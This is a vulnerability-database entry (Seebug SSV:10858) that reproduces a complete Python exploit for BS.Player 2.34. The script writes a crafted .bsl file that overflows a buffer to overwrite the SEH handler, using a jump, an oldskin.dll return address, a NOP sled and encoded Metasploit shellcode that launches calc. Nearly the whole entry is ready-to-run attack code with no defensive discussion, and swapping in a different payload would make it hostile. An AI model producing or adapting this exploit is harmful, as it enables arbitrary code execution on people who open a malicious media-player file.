BS.Player 2.34 (.bsl) Universal SEH Overwrite Exploit

2009-03-23T00:00:00
ID SSV:10858
Type seebug
Reporter Root
Modified 2009-03-23T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #usage: exploit.py
print \"**************************************************************************\"
print \" Bs.Player 2.34 (.bsl) Universal Seh Overwrite Exploit\\n\"
print \" Author : Nine:Situations:Group::pyrokinesis\"
print \" Exploited by : His0k4\"
print \" Tested on: Windows XP Pro SP2 Fr\\n\"
print \" Greetings to:\"
print \" All friends & muslims HaCkers(dz)\\n\"
print \"**************************************************************************\"
         	
			
buff = \"\\x41\" * 412

next_seh = \"\\xEB\\x12\\x41\\x41\"

seh = \"\\xD0\\x26\\x58\\x02\" # oldskin.dll

nops = \"\\x90\"*19

header1= \"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x52\\x61\\x77\\x2D\\x48\\x69\\x67\\x68\\x2E\"
header2= \"\\x2E\\x46\\x4D\\x2F\\x6C\\x69\\x73\\x74\\x65\\x6E\\x2E\\x70\\x6C\\x73\\x0A\\x00\"

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode = (
\"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"
\"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"
\"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"
\"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"
\"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\"
\"\\x42\\x50\\x42\\x30\\x42\\x30\\x4b\\x58\\x45\\x34\\x4e\\x33\\x4b\\x58\\x4e\\x37\"
\"\\x45\\x30\\x4a\\x37\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x51\\x4b\\x58\"
\"\\x4f\\x55\\x42\\x42\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x58\\x46\\x33\\x4b\\x48\"
\"\\x41\\x30\\x50\\x4e\\x41\\x33\\x42\\x4c\\x49\\x49\\x4e\\x4a\\x46\\x58\\x42\\x4c\"
\"\\x46\\x57\\x47\\x30\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e\"
\"\\x46\\x4f\\x4b\\x33\\x46\\x55\\x46\\x52\\x46\\x50\\x45\\x37\\x45\\x4e\\x4b\\x58\"
\"\\x4f\\x45\\x46\\x42\\x41\\x30\\x4b\\x4e\\x48\\x56\\x4b\\x38\\x4e\\x30\\x4b\\x34\"
\"\\x4b\\x58\\x4f\\x35\\x4e\\x31\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x41\\x4b\\x58\"
\"\\x41\\x50\\x4b\\x4e\\x49\\x48\\x4e\\x45\\x46\\x52\\x46\\x50\\x43\\x4c\\x41\\x53\"
\"\\x42\\x4c\\x46\\x56\\x4b\\x58\\x42\\x54\\x42\\x53\\x45\\x48\\x42\\x4c\\x4a\\x57\"
\"\\x4e\\x50\\x4b\\x58\\x42\\x54\\x4e\\x30\\x4b\\x38\\x42\\x57\\x4e\\x41\\x4d\\x4a\"
\"\\x4b\\x38\\x4a\\x46\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x48\\x42\\x4b\"
\"\\x42\\x50\\x42\\x50\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x53\\x4f\\x35\\x41\\x33\"
\"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x57\"
\"\\x42\\x35\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49\"
\"\\x50\\x4f\\x4c\\x48\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\"
\"\\x4e\\x46\\x43\\x46\\x42\\x30\\x5a\")

	
exploit = header1 + buff + next_seh + seh + nops + shellcode + header2

try:
    out_file = open(\"exploit.bsl\",\'w\')
    out_file.write(exploit)
    out_file.close()
    print \"Exploit file created!\\n\"
except:
    print \"Error\"